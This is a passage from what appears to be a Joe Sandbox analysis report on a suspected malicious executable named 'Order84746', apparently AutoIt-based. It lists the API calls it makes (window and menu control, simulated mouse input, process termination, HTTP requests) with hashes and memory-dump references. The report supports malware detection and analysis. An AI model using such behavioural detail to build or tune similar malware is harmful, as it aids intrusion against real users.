                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                          • String ID:
                          • API String ID: 3451389628-0
                          • Opcode ID: 2868edc2e3e46de62c42aaf0a5fac54c68d836200a5c3bc9380178b1b3b2b538
                          • Instruction ID: 96a713be207486b54fbf707b2ae89aba723011e376de2785dbb159aa3f138d4e
                          • Opcode Fuzzy Hash: 2868edc2e3e46de62c42aaf0a5fac54c68d836200a5c3bc9380178b1b3b2b538
                          • Instruction Fuzzy Hash: 21515631608344AFC704EF68CC85E6ABBE9FF89310F04891DF595972A1DB71EA09DB52
                          APIs
                          • GetMenu.USER32(?), ref: 00948540
                          • GetMenuItemCount.USER32(00000000), ref: 00948577
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0094859F
                          • GetMenuItemID.USER32(?,?), ref: 0094860E
                          • GetSubMenu.USER32(?,?), ref: 0094861C
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0094866D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Menu$Item$CountMessagePostString
                          • String ID:
                          • API String ID: 650687236-0
                          • Opcode ID: 50101610cadf8ae1193e5b328c2c79087399f1631122c84b9c1bb26f1b7bc78b
                          • Instruction ID: 13338b2aa4d29b4d2f23b87717f9b388845005b121d0b83a437db93cc9330296
                          • Opcode Fuzzy Hash: 50101610cadf8ae1193e5b328c2c79087399f1631122c84b9c1bb26f1b7bc78b
                          • Instruction Fuzzy Hash: 91519F71E00229AFCB11EF69C945AAEB7F8FF48710F114499F915B7391CB70AE418B91
                          APIs
                          • _memset.LIBCMT ref: 00924B10
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00924B5B
                          • IsMenu.USER32(00000000), ref: 00924B7B
                          • CreatePopupMenu.USER32 ref: 00924BAF
                          • GetMenuItemCount.USER32(000000FF), ref: 00924C0D
                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00924C3E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID:
                          • API String ID: 3311875123-0
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • BeginPaint.USER32(?,?,?), ref: 008FAC2A
                          • GetWindowRect.USER32(?,?), ref: 008FAC8E
                          • ScreenToClient.USER32(?,?), ref: 008FACAB
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008FACBC
                          • EndPaint.USER32(?,?,?,?,?), ref: 008FAD06
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0095E673
                          Similarity
                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                          • String ID:
                          • API String ID: 2592858361-0
                          APIs
                          • ShowWindow.USER32(009A1628,00000000,009A1628,00000000,00000000,009A1628,?,0095DC5D,00000000,?,00000000,00000000,00000000,?,0095DAD1,00000004), ref: 0094E40B
                          • EnableWindow.USER32(00000000,00000000), ref: 0094E42F
                          • ShowWindow.USER32(009A1628,00000000), ref: 0094E48F
                          • ShowWindow.USER32(00000000,00000004), ref: 0094E4A1
                          • EnableWindow.USER32(00000000,00000001), ref: 0094E4C5
                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0094E4E8
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 009298D1
                            • Part of subcall function 008FF4EA: std::exception::exception.LIBCMT ref: 008FF51E
                            • Part of subcall function 008FF4EA: __CxxThrowException@8.LIBCMT ref: 008FF533
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00929908
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00929924
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0092999E
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009299B3
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 009299D2
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                          • String ID:
                          • API String ID: 2537439066-0
                          APIs
                          • GetForegroundWindow.USER32(?,?,?,?,?,?,009377F4,?,?,00000000,00000001), ref: 00939B53
                            • Part of subcall function 00936544: GetWindowRect.USER32(?,?), ref: 00936557
                          • GetDesktopWindow.USER32 ref: 00939B7D
                          • GetWindowRect.USER32(00000000), ref: 00939B84
                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00939BB6
                            • Part of subcall function 00927A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927AD0
                          • GetCursorPos.USER32(?), ref: 00939BE2
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00939C44
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                          • String ID:
                          • API String ID: 4137160315-0
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                            • Part of subcall function 008FC6F4: _wcscpy.LIBCMT ref: 008FC717
                          • _wcstok.LIBCMT ref: 0093184E
                          • _wcscpy.LIBCMT ref: 009318DD
                          • _memset.LIBCMT ref: 00931910
                          Strings
                          Similarity
                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                          • String ID: X
                          • API String ID: 774024439-3081909835
                          APIs
                            • Part of subcall function 008FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008FAFE3
                            • Part of subcall function 008FAF83: SelectObject.GDI32(?,00000000), ref: 008FAFF2
                            • Part of subcall function 008FAF83: BeginPath.GDI32(?), ref: 008FB009
                            • Part of subcall function 008FAF83: SelectObject.GDI32(?,00000000), ref: 008FB033
                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0094EC20
                          • LineTo.GDI32(00000000,00000003,?), ref: 0094EC34
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0094EC42
                          • LineTo.GDI32(00000000,00000000,?), ref: 0094EC52
                          • EndPath.GDI32(00000000), ref: 0094EC62
                          • StrokePath.GDI32(00000000), ref: 0094EC72
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          APIs
                          • GetDC.USER32(00000000), ref: 0091E1C0
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0091E1D1
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0091E1D8
                          • ReleaseDC.USER32(00000000,00000000), ref: 0091E1E0
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0091E1F7
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0091E209
                            • Part of subcall function 00919AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00919A05,00000000,00000000,?,00919DDB), ref: 0091A53A
                          Similarity
                          • API ID: CapsDevice$ExceptionRaiseRelease
                          • String ID:
                          • API String ID: 603618608-0
                          APIs
                          • __init_pointers.LIBCMT ref: 00907B47
                            • Part of subcall function 0090123A: __initp_misc_winsig.LIBCMT ref: 0090125E
                            • Part of subcall function 0090123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00907F51
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00907F65
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00907F78
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00907F8B
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00907F9E
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00907FB1
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00907FC4
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00907FD7
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00907FEA
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00907FFD
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00908010
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00908023
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00908036
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00908049
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0090805C
                            • Part of subcall function 0090123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0090806F
                          • __mtinitlocks.LIBCMT ref: 00907B4C
                            • Part of subcall function 00907E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0099AC68,00000FA0,?,?,00907B51,00905E77,00996C70,00000014), ref: 00907E41
                          • __mtterm.LIBCMT ref: 00907B55
                            • Part of subcall function 00907BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00907D3F
                            • Part of subcall function 00907BBD: _free.LIBCMT ref: 00907D46
                            • Part of subcall function 00907BBD: RtlDeleteCriticalSection.NTDLL(0099AC68), ref: 00907D68
                          • __calloc_crt.LIBCMT ref: 00907B7A
                          • GetCurrentThreadId.KERNEL32 ref: 00907BA3
                          Similarity
                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 2942034483-0
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E281D
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 008E2825
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E2830
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E283B
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 008E2843
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 008E284B
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 1423608774-0
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00927C07
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00927C1D
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00927C2C
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00927C3B
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00927C45
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00927C4C
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 00929A33
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00929A44
                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00955DEE,?,?,?,?,?,008EED63), ref: 00929A51
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00955DEE,?,?,?,?,?,008EED63), ref: 00929A5E
                            • Part of subcall function 009293D1: CloseHandle.KERNEL32(?,?,00929A6B,?,?,?,00955DEE,?,?,?,?,?,008EED63), ref: 009293DB
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00929A71
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00929A78
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: d7f7ea2c7d70c2af1a5ae9af81def1f58660d7043b5edf84064fe7a670812b95
                          • Instruction ID: f651a4c67200971a83b598634cda829ed21c6d1c6aef6d23a31babd4b4393f85
                          • Opcode Fuzzy Hash: d7f7ea2c7d70c2af1a5ae9af81def1f58660d7043b5edf84064fe7a670812b95
                          • Instruction Fuzzy Hash: F1F08232A5A211ABD7112BA4FC9DEEF7739FF88701F140429F523950A4DBF59801EB60
                          APIs
                            • Part of subcall function 008FF4EA: std::exception::exception.LIBCMT ref: 008FF51E
                            • Part of subcall function 008FF4EA: __CxxThrowException@8.LIBCMT ref: 008FF533
                          • __swprintf.LIBCMT ref: 008E1EA6
                          Strings
                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008E1D49
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Exception@8Throw__swprintfstd::exception::exception
                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                          • API String ID: 2125237772-557222456
                          • Opcode ID: 1dc0f0186b2a7358a89145771efad39f383d2ef63d18a44885e1a155d97b2adb
                          • Instruction ID: 75436a48ef0fc037007035bc9958f078e30a3f3031b3e505ced6815fea60fe18
                          • Opcode Fuzzy Hash: 1dc0f0186b2a7358a89145771efad39f383d2ef63d18a44885e1a155d97b2adb
                          • Instruction Fuzzy Hash: 4B915F715083819FC714EF2AC895C6AB7A8FF96700F00491DF995D72A1EB70ED09CB92
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0093B006
                          • CharUpperBuffW.USER32(?,?), ref: 0093B115
                          • VariantClear.OLEAUT32(?), ref: 0093B298
                            • Part of subcall function 00929DC5: VariantInit.OLEAUT32(00000000), ref: 00929E05
                            • Part of subcall function 00929DC5: VariantCopy.OLEAUT32(?,?), ref: 00929E0E
                            • Part of subcall function 00929DC5: VariantClear.OLEAUT32(?), ref: 00929E1A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4237274167-1221869570
                          • Opcode ID: 62e0d57457eb7611819937f822504ec0b93c122b587dbf19ad61907de3307503
                          • Instruction ID: a6aaf8c71598a61211e58314e0217e7b05f91bca0e580a82341f019136d38912
                          • Opcode Fuzzy Hash: 62e0d57457eb7611819937f822504ec0b93c122b587dbf19ad61907de3307503
                          • Instruction Fuzzy Hash: 259167706083419FCB10DF28C481A5AB7E8FF89700F04496DF99A8B3A2DB31E945CB52
                          APIs
                            • Part of subcall function 008FC6F4: _wcscpy.LIBCMT ref: 008FC717
                          • _memset.LIBCMT ref: 00925438
                          • GetMenuItemInfoW.USER32(?), ref: 00925467
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00925513
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0092553D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                          • String ID: 0
                          • API String ID: 4152858687-4108050209
                          • Opcode ID: 5d2203b4800a35a7bc723150af075d85b25de6c8146c48603959e768890897fc
                          • Instruction ID: b70283709792582b9d868c819aed4308115a273a73e46d073f50171b5c8ec49c
                          • Opcode Fuzzy Hash: 5d2203b4800a35a7bc723150af075d85b25de6c8146c48603959e768890897fc
                          • Instruction Fuzzy Hash: D451F3716187219BD714EF28E841A7BB7E9EF86350F050A2DF895D31A4D7B0CD448B92
                          APIs
                          • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0092027B
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009202B1
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009202C2
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00920344
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$AddressCreateInstanceProc
                          • String ID: DllGetClassObject
                          • API String ID: 753597075-1075368562
                          • Opcode ID: be51a59147da1f716e5d41ac819afa947f131f58a52704025b9b4d84255ae33e
                          • Instruction ID: 249b7725ba6012e5e41017f13f2929f65a41284b110f373e47bdd75dfc89f2cc
                          • Opcode Fuzzy Hash: be51a59147da1f716e5d41ac819afa947f131f58a52704025b9b4d84255ae33e
                          • Instruction Fuzzy Hash: 33417C71A05228EFDB05CF54D8C4B9A7BB9EF88314B1480ADED099F20AD7F5D944CBA0
                          APIs
                          • _memset.LIBCMT ref: 00925075
                          • GetMenuItemInfoW.USER32 ref: 00925091
                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009250D7
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009A1708,00000000), ref: 00925120
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: 172101b2149c37c67a56c45dbc6943600472ab0ad989258592e467870d30e8ff
                          • Instruction ID: 80595be4373f34e1e634f05d61b71f3024fc7ee6a7a7ace509d0d057688a86e8
                          • Opcode Fuzzy Hash: 172101b2149c37c67a56c45dbc6943600472ab0ad989258592e467870d30e8ff
                          • Instruction Fuzzy Hash: 1B41D0302097119FD720DF28EC80B6AB7E8AF85324F054A1EF8A5D7296D770E814CB62
                          APIs
                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00940587
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 2358735015-567219261
                          • Opcode ID: 80684356886dcaea64358af1559fb251e7ab5d0eca32a8c5c2000eaa47a5857f
                          • Instruction ID: b2f4c4ad52acfc8fbfeeb89c9a1a3e215849cbd39b31a1bd78743f695680dc28
                          • Opcode Fuzzy Hash: 80684356886dcaea64358af1559fb251e7ab5d0eca32a8c5c2000eaa47a5857f
                          • Instruction Fuzzy Hash: A831837090021AABCF10EF68CD51DEEB3B8FF95314B104629F526A76D1DB71E916CB90
                          APIs
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0091B88E
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0091B8A1
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 0091B8D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                           • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: ComboBox$ListBox
                          • API String ID: 3850602802-1403004172
                          • Opcode ID: 0e89394f20b559d7e5fdd147fb1941d323b35fc9a7c6f8bea75a88770d67c49b
                          • Instruction ID: 8615082f5282328305df2dd99aee2ebf94130a3b73518c06a31408818d9dc59f
                          • Opcode Fuzzy Hash: 0e89394f20b559d7e5fdd147fb1941d323b35fc9a7c6f8bea75a88770d67c49b
                          • Instruction Fuzzy Hash: 2521E172E00108BFDB04AB69C8869FE777EEF56754F10412DF121A21E1DB784D469760
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00934401
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00934427
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00934457
                          • InternetCloseHandle.WININET(00000000), ref: 0093449E
                            • Part of subcall function 00935052: GetLastError.KERNEL32(?,?,009343CC,00000000,00000000,00000001), ref: 00935067
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
